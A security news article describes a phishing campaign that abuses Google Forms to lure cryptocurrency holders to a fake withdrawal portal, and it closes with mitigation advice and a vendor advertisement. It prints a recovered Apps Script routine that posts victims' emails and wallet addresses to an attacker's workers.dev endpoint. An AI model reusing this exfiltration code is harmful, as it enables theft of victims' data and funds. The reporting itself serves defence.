Hackers Leverage Google Forms Surveys to Trick Victims into Stealing Cryptocurrency

Google Forms, praised for friction-free data collection, has become the unlikely staging ground for rapidly spreading crypto-phishing campaign.

First detected in late-2024 but surging in Q2 2025, the ploy begins with an unsolicited email containing a legitimate‐looking forms.gle link that easily bypasses most spam gateways.

Once opened, the form impersonates a well-known exchange and congratulates the recipient on a “pending 1.275 BTC payout.”

A single click ushers targets toward a counterfeit withdrawal portal, where they are asked to “verify” a wallet address and pay a nominal “network fee.”

Within seconds the supplied credentials are siphoned to a command-and-control (C2) server hidden behind Cloudflare Workers, and any payment is spirited to mixer wallets, obliterating the money trail.

What makes the operation exceptional is its clever use of the Google Forms notification engine.

Because every lure originates from Google’s own SMTP infrastructure, domain-reputation checks almost always return clean results, granting the adversaries near-perfect inbox placement.

Kaspersky analysts noted the spike after observing a 63 percent rise in Google Forms-based phishing messages during routine telemetry reviews of consumer endpoints in early July 2025, flagging the campaign as one of the year’s most effective low-tech social-engineering attacks.

Infection Mechanism: Credential Harvesting via Embedded WebHooks

The malicious form leverages an Apps Script-bound WebHook that silently exfiltrates data the moment the victim clicks “Submit,” without waiting for form completion.

The script also injects a one-time JavaScript redirect to hxxps://claim-btc-id[.]online, a clone site hosting a polished React front end and a Python Flask API that proxies every request to the attacker’s C2.

The following trimmed snippet, recovered from a leaked form template, highlights the exfil routine:-

function onFormSubmit(e){
  const payload = JSON.stringify({
      email: e.namedValues['Email'][0],
      wallet: e.namedValues['Wallet Address'][0]
  });
  UrlFetchApp.fetch('https://worker-cryptodrip.workers.dev/submit', {
      method: 'post',
      contentType: 'application/json',
      payload: payload
  });
}

This shows the initial phishing message, while the below one shows the “Fake Withdrawal Portal” captures the fake payout page.

Mitigation hinges on layered defenses: implement content-disarm rules that quarantine any Google Forms emails not explicitly whitelisted, and deploy browser extensions capable of blocking outbound requests to unfamiliar Workers domains.

Finally, security awareness programs must reiterate the timeless principle—free cryptocurrency never arrives via a form submission.

Experience faster, more accurate phishing detection and enhanced protection for your business with real-time sandbox analysis-> Try ANY.RUN now